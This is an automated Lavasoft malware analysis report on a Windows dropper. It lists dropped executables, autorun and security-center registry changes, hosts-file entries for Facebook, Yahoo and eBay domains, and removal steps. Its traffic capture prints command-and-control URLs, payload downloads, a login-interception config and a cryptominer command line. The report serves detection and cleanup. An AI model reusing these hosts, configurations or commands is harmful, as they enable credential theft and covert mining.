Susp_Dropper (Kaspersky), Gen:Variant.Symmi.25089 (B) (Emsisoft), Gen:Variant.Symmi.25089 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour:
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0306430436df74471b0a3f2309632415
SHA1: 6bf118b40bc8419d9f94b38142e60e4c4b9e25b5
SHA256: b1741d35878ccb5469ffc30ee659a3ef716ff18b63f824f85dfc8f61778cfdba
SSDeep: 24576:wW79BHGwwIYpXGGHXFRGTTD2jCs16J oVa/d3n3bnSVEYpL:5S9 TvAF/tn/Yh
Size: 838144 bytes
File type: EXE
Platform: WIN32
Entropy: Probably Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-04-07 10:49:58
Analyzed on: WindowsXP SP3 32-bit
Summary:
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Malware creates the following process(es):
%original file name%.exe:1968
zcwj1w7efz3kqsxdn.exe:2252
zcwj1w7efe89qsxdn.exe:240
zcwj1w7efm80qsxdn.exe:880
alccsjb.exe:3776
zcwj1w7efav5qsxdnln67pfy.exe:2384
pozlrpaqbu.exe:1560
pozlrpaqbu.exe:3076
The Malware injects its code into the following process(es):No processes have been created.
File activity
The process %original file name%.exe:1968 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mjbaidfvllkvssl\tst (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\zcwj1w7efav5qsxdnln67pfy.exe (3911 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\zcwj1w7efav5qsxdnln67pfy.exe (0 bytes)
The process zcwj1w7efm80qsxdn.exe:880 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mjbaidfvllkvssl\tst (10 bytes)
The process alccsjb.exe:3776 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mjbaidfvllkvssl\tst (10 bytes)
The process zcwj1w7efav5qsxdnln67pfy.exe:2384 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mjbaidfvllkvssl\etc (10 bytes)
%System%\mjbaidfvllkvssl\tst (10 bytes)
%System%\pozlrpaqbu.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
The Malware deletes the following file(s):
%System%\drivers\etc\hosts (0 bytes)
The process pozlrpaqbu.exe:1560 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mjbaidfvllkvssl\tst (10 bytes)
The process pozlrpaqbu.exe:3076 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mjbaidfvllkvssl\cfg (821 bytes)
%System%\mjbaidfvllkvssl\tst (10 bytes)
%System%\mjbaidfvllkvssl\run (10 bytes)
%System%\win64drkaesent.exe (67687 bytes)
%WinDir%\Temp\zcwj1w7efyx1qsxdn.exe (1940 bytes)
%System%\win64drkclient.exe (68472 bytes)
%System%\mjbaidfvllkvssl\ihst (226 bytes)
%System%\drivers\etc\hosts (904 bytes)
%System%\alccsjb.exe (5873 bytes)
%WinDir%\Temp\zcwj1w7efm80qsxdn.exe (5873 bytes)
%System%\win32drkclient.exe (25340 bytes)
%System%\mjbaidfvllkvssl\por (1 bytes)
%WinDir%\Temp\zcwj1w7efe89qsxdn.exe (35 bytes)
%System%\mjbaidfvllkvssl\rng (192 bytes)
%WinDir%\Temp\zcwj1w7efz3kqsxdn.exe (35 bytes)
The Malware deletes the following file(s):
%WinDir%\Temp\zcwj1w7efe89qsxdn.exe (0 bytes)
%WinDir%\Temp\zcwj1w7efm80qsxdn.exe (0 bytes)
%WinDir%\Temp\zcwj1w7efz3kqsxdn.exe (0 bytes)
%WinDir%\Temp\zcwj1w7efyx1qsxdn.exe (0 bytes)
Registry activity
The process zcwj1w7efz3kqsxdn.exe:2252 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 39 A6 8D ED 2E 3D A3 AC A4 F8 8E 20 6F 88 01"
The process zcwj1w7efe89qsxdn.exe:240 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 FF 6B 77 C8 5C A8 49 EF 29 CF 94 0E 53 1D C3"
The process zcwj1w7efm80qsxdn.exe:880 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 67 37 7B 60 71 56 DE F5 B2 0F 87 A9 D9 0D 20"
The process zcwj1w7efav5qsxdnln67pfy.exe:2384 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "41 84 24 D1 A4 E8 42 E7 BB 7E AF AE 6C D6 F3 A9"
To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"COM Sharing Registrar CardSpace Detection" = "%System%\pozlrpaqbu.exe"
The process pozlrpaqbu.exe:3076 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 C8 FF 50 02 C0 95 ED 1F 8D 42 65 60 99 C9 79"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The Malware deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
Dropped PE files
MD5 | File path |
---|---|
14ff2121eda9993823b5b7e32a6475c9 | c:\WINDOWS\system32\win32drkclient.exe |
ee117a41ec7d1a8a78ec55ae1d66909a | c:\WINDOWS\system32\win64drkaesent.exe |
897914962939e2406d9a25261cf7b604 | c:\WINDOWS\system32\win64drkclient.exe |
HOSTS file anomalies
The Malware modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 804 bytes in size. The following strings are added to the hosts file listed below:
127.0.0.1 | www.facebook.com |
127.0.0.1 | facebook.com |
127.0.0.1 | mail.yahoo.com |
127.0.0.1 | my.ebay.com |
127.0.0.1 | cgi.ebay.com |
127.0.0.1 | offer.ebay.com |
127.0.0.1 | feedback.ebay.com |
127.0.0.1 | motors.search.ebay.com |
127.0.0.1 | search.ebay.com |
127.0.0.1 | pages.ebay.com |
127.0.0.1 | pages.motors.ebay.com |
127.0.0.1 | myworld.ebay.com |
127.0.0.1 | motors.listings.ebay.com |
127.0.0.1 | cgi1.ebay.com |
127.0.0.1 | contact.ebay.com |
127.0.0.1 | srx.ebaymotors.ebayrtm.com |
127.0.0.1 | motors.shop.ebay.com |
127.0.0.1 | forums.ebay.com |
127.0.0.1 | answercenter.ebay.com |
127.0.0.1 | shop.ebay.com |
127.0.0.1 | ocs.ebay.com |
127.0.0.1 | cschatlb-na.corp.ebay.com |
127.0.0.1 | cschat1-na.corp.ebay.com |
127.0.0.1 | cschat.ebay.com |
127.0.0.1 | helpdesk.corp.ebay.com |
127.0.0.1 | qu.corp.ebay.com |
127.0.0.1 | www.ebay.com |
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1968
zcwj1w7efz3kqsxdn.exe:2252
zcwj1w7efe89qsxdn.exe:240
zcwj1w7efm80qsxdn.exe:880
alccsjb.exe:3776
zcwj1w7efav5qsxdnln67pfy.exe:2384
pozlrpaqbu.exe:1560
pozlrpaqbu.exe:3076 - Delete the original Malware file.
- Delete or disinfect the following files created/modified by the Malware:
%System%\mjbaidfvllkvssl\tst (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\zcwj1w7efav5qsxdnln67pfy.exe (3911 bytes)
%System%\mjbaidfvllkvssl\etc (10 bytes)
%System%\pozlrpaqbu.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\mjbaidfvllkvssl\cfg (821 bytes)
%System%\mjbaidfvllkvssl\run (10 bytes)
%System%\win64drkaesent.exe (67687 bytes)
%WinDir%\Temp\zcwj1w7efyx1qsxdn.exe (1940 bytes)
%System%\win64drkclient.exe (68472 bytes)
%System%\mjbaidfvllkvssl\ihst (226 bytes)
%System%\alccsjb.exe (5873 bytes)
%WinDir%\Temp\zcwj1w7efm80qsxdn.exe (5873 bytes)
%System%\win32drkclient.exe (25340 bytes)
%System%\mjbaidfvllkvssl\por (1 bytes)
%WinDir%\Temp\zcwj1w7efe89qsxdn.exe (35 bytes)
%System%\mjbaidfvllkvssl\rng (192 bytes)
%WinDir%\Temp\zcwj1w7efz3kqsxdn.exe (35 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"COM Sharing Registrar CardSpace Detection" = "%System%\pozlrpaqbu.exe" - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 658438 | 658944 | 4.70058 | 5a956f6ef3d48190316db8984480cd3b |
.rdata | 663552 | 52386 | 52736 | 3.66732 | 75fd3137681c7e920256f904aeffb460 |
.data | 716800 | 159324 | 125440 | 5.50184 | 3b3c70bbd40ea495fc354b3ae364ff3f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://tablefruit.net/forum/search.php?method=validate&mode=sox&v=027&sox=3c0f8605 | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=all&flag&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU 3040 @ 1.86GHz (1861 MHz)&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=hostname&host=www.facebook.com&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/dep/win64drkclient.exe | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=checkport&port=23338&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/dep/win32drkclient.exe | 98.139.135.198 |
hxxp://tablefruit.net/dep/win64drkaesent.exe | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=setvar&key=stopped&value=3b93be04&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=post&type=miner_forced&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/forum/search.php?method=all&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://tablefruit.net/forum/pingtest | 98.139.135.198 |
hxxp://partyorderly.net/dep/win32drkclient.exe | 98.139.135.198 |
hxxp://partyorderly.net/dep/win64drkclient.exe | 98.139.135.198 |
hxxp://partyorderly.net/dep/win64drkaesent.exe | 98.139.135.198 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /forum/search.php?method=all&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:22 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
ping.5.FLAG cfg.293."jinoplasker.com" "limosebast.com" "uponloud.net" "glasshealth.net" "stickmarch.net" "frontride.net" "necessarydress.net" "wrongthrew.net" "spendmarry.net" "requireneither.net" "gentlefriend.net" "littleappear.net" "rememberpaint.net" "tablefruit.net" "mightglossary.net" "throughcountry.net" var_user_ip.563.%invite_cc% = "1";.%ban_contact% = "1";.%live_link% = "hXXp://helpdesk.corp.ebay.com/chat.php?id=4094&sess=7cb9d43961b9887cd63eed7c5ac5f694&talk=1";.ëaylive% = "partyorderly.net";.%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.Þp_host% = "partyorderly.net";.Þp_path% = "/dep/";.%no_password% = "0";.%timer% = "480";.%state% = "CA";.%cpuinfo% = "Intel(R) Xeon(R) CPU 3040 @ 1.86GHz (1861 MHz)";..............
GET /forum/search.php?method=setvar&key=stopped&value=3b93be04&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:17 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 6
Server: YTS/1.20.28
.............
GET /forum/pingtest HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:55 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 14 May 2012 04:16:44 GMT
Accept-Ranges: bytes
Content-Length: 101376
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28
....jj..5j.s.......\F@|.#C>W....H!...4.jR.s5)....#\....F.RW#r....F.H\.j..-5R.m.).!....F..<#.}..r.KH....\oqR...).....m...6....kr}....f.\..&.oYl..,......m...6EL}."....u.f.Bo.D..Y...,Q.m..56....Eja.".ef.....m.YD..,..2.Qm...6.E..."j....f...3.Dm.o....Q....m.6.6q.j.8~.....f..m3....c.....m...6..<.qv..8;.f...3........c.Y...%....q.~E8v...;.O......w.c.;.............v~c.;.........l..w...;[%...?....~..e.c..........wl..;....[.z..?|....c..}.......%l.......[.....~z.??|.......}.......e...#........?~~^.??........................;~...?~...?xo...s..........wT..;e....~..5?....x........|e...p.w_..;....W... .x......5.....|..w...;_....~x.W?{. .\..O.....|..%...._.......W~}v ?>......O....g....-...o...#~...?}.~.>}<O.>......g.....Q........}.xs>....}...>o[g..d..[....3.......b.xu&}.:.>....o.O.....[s:..9.....x....u...:..o.qf..8.[....s...9g...3.u...:........q.<.8q.s..?9..{.g. .3....{....=q..|8.o..q......g...3.....{m.{.....W....qowD..;].......3....{{s3...R..\.o..p.wW..;.2..U...*.{..e.s.|..e..\..w...;Wl9...R.U[..*-.s.......\e.-....W.y..l..U.^;*[...-W=....e......F..u.ly:F...@[^..-....W.r............yu@7.:..^..-...~W.t3...S......n.u...:@."..m...6....u.t.........G.n..@.|...>..m...6O.t.....SV..).n..~.....|.im>.v6.a..O0......S...)......|..F>.x.....Oa...0o@S.7.).....M...&n.....x.na...0....o.0.7`x..0l.M...&..x......B..a.o.0.7....`L.M0&.&..k...>..D......a...0hU`...0LZ..&........k..D5"a...0....hF.L...&ZQ...(.....Dk.X.5.1....h.AN.F GZ....Q...(.4k.r.5.9.........FA.L. s.Q..E(.....n..r.-.9.q...%A... .{..s....^l.
<<
<<< skipped >>>
POST /forum/search.php?method=post&type=miner_forced&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
data=c3Bhd25lZDogJ3dpbjMyZHJrY2xpZW50LmV4ZSAtYSBYMTEgLW8gc3RyYXR1bSt0Y3A6Ly8xMDguMTc0LjE0Ni43ODozMzg4IC11IDNjMGY4NjA1IC1wIHgnDQo=
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:19 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
.............
GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU 3040 @ 1.86GHz (1861 MHz)&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 16:59:55 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
.............
GET /dep/win64drkaesent.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:09 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 24 Feb 2014 22:08:01 GMT
Accept-Ranges: bytes
Content-Length: 2777088
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......S.................. ..\*..d............@..............................0 .......*....... .......................................*.......*..$............'...............*..G.......................... .*.(.....................*.@............................text..... ....... .................`.p`.data......... ....... .............@....rdata...&....!..(....!.............@.`@.pdata........'.......'.............@.0@.xdata........).......(.............@.@@.bss....`b....*.......................`..edata........*.......).............@.0@.idata...$....*..&....).............@.0..CRT....p.....*.......*.............@.@..tls....h.....*.......*.............@.`..reloc...G....*..H....*.............@.0B.................................................................................................................................................................................................ffffff.........H..(1.f.=....MZ.._@*.......Q@*.......C@*.......I@*.....tg....)...K@*...tH......e. .H........( ...;@*.H...`*.H..u`*.H....*.....- ..=..!..tf1.H..(......... ......Hc.....H..B...H...:PE..u...J.f....t?f......j............].........1.......K...f.H...- ...- .1.H..(..zt...,.........1............H..8...?*.D...?*.L....).H....).H....).....).H....).H.D$ .c. .....).H..8.........AUATUWVSH......D...?*.1......H.T$ E..H...H.......eH..%0...1.H.X.H.=i.*..........H9...'..........H...H...._*.H..u...._*.1........
<<
<<< skipped >>>
GET /dep/win32drkclient.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:05 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Sun, 23 Feb 2014 00:22:10 GMT
Accept-Ranges: bytes
Content-Length: 962048
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9?.S.................:....... ...........P....@.................................W......... .........................................................................................................................`............................text....9.......:..................`.``.data........P.......>..............@....rdata...K...`...L...F..............@.`@.bss..................................`..idata..............................@.0..CRT....8...........................@.0..tls.... ...........................@.0.....................................................................................................................................................................................................................................................................................................................................................................................&......'.......1.f.=..@.MZ....N.........N.........N.........N.....th...N....N...tJ..$...........$.............N..P.N..T.N..4.N.........=dWM..tm1.......&......$...........f...<.@.....@.PE......@.u...Q.f....t?f......j............].........1.......K....v...$..L......1......yt...,.........1...........f...,. .N..D$...N..D$...N..D$...N....N..$.N...$..N..D$.........N...,.........'....U1........WV.U.S....|...0.b...)..D$...........@......@......@......@......@......@......@...........N.........d.....1..X..
<<
<<< skipped >>>
GET /forum/search.php?method=checkport&port=23338&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:02 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 32
Server: YTS/1.20.28
GET /forum/search.php?method=validate&mode=sox&v=027&sox=3c0f8605 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 16:59:53 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
304..PhS........tablefruit.net.........8[dOc.E.t?r&..........X..6)].af/.p.c..............;E..|PG..ot.2.).~...L...m...".........:......[j|"(..,....!.Nv8kA.La.whu..........|.w,8...(.~...."....F.VS..,d..7.:.^-...M.'.<../6~....S0S.Nt<c...I..L.........F..(P..{M..v.........Y...y.....!.g...\....v...v...tM..q$..W.<.:..f.'.....r..:...4zd...'...._.....9.......Y[lg5.........L.{..k..........9..........z..._B=.-..,....aX&.4.....".b..:....sB^.n;.......@>.....i.PR#....'...r!.o.Ho(..8.E.....k...Bg...m....w|.._.S3.d......1K{.c..Q<.&. n.....'....V.f....;2t.d...........P..."}...V?U..R....6.c....T.x.......|.}....m...d.W....W......PD.....0..S........}.C(....0./...M.|.)'...^|.1.....6.....V V..<...G.&.!.....$.g#-..........4..Ks.... ..$4..q..cML.,Y....B.'...Y&.Y-),./.....2..a..K.1c.,.@.........5.........d..5.q0.^7 ..|..f.r.{..{...E...o3X.....F....dg...^.,..z....W@.......$Z.R.y. ..#.z....`....$(.....6....!.P..J.p..............s...>....hv.........Wo.[.....Y.K|...A.@.~bd..T.6.Mi.|..".m..q....H.L.@..<s....7`....T..>..Q(.;...e ........P.....B..h..>.\.. ..=.i@...I........8...j3a.|.V..........A.....S..%?...L#...aka........s4..nT....t;.@~..v.We .=........w.,...:.).T...}.tT..
GET /forum/search.php?method=all&flag&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 16:59:54 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
ping.5.FLAG cfg.293."jinoplasker.com" "limosebast.com" "requireneither.net" "frontride.net" "rememberpaint.net" "uponloud.net" "gentlefriend.net" "glasshealth.net" "littleappear.net" "stickmarch.net" "throughcountry.net" "wrongthrew.net" "tablefruit.net" "necessarydress.net" "spendmarry.net" "mightglossary.net" var_user_ip.650.%kill_jhminer% = "1";.%invite_cc% = "1";.ºn_contact% = "1";.%live_link% = "hXXp://helpdesk.corp.ebay.com/chat.php?id=4094&sess=7cb9d43961b9887cd63eed7c5ac5f694&talk=1";.ëaylive% = "partyorderly.net";.%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.Þp_host% = "partyorderly.net";.Þp_path% = "/dep/";.%no_password% = "0";.%timer% = "480";.%state% = "CA";.%cpuinfo% = "QEMU Virtual CPU version 0.12.5 (2499 MHz)";.%ip% = "86.35.223.12";.%relay_soxid% = "3b93be04";.%port% = "22271";.plugin.55070.miner_forced.80.win32drkclient.exe -a X11 -o stratum tcp://108.174.146.78:3388 -u 3c0f8605 -p x.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........lg...4...4...4.?y4...4...4...49..4...4...4...4...4...4...4...4...4...4Rich...4................PE..L.....\S.....................N....................@.............................................................................(.......................................................................@...............(...
<<
<<< skipped >>>
GET /forum/search.php?method=all&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 17:00:29 GMT
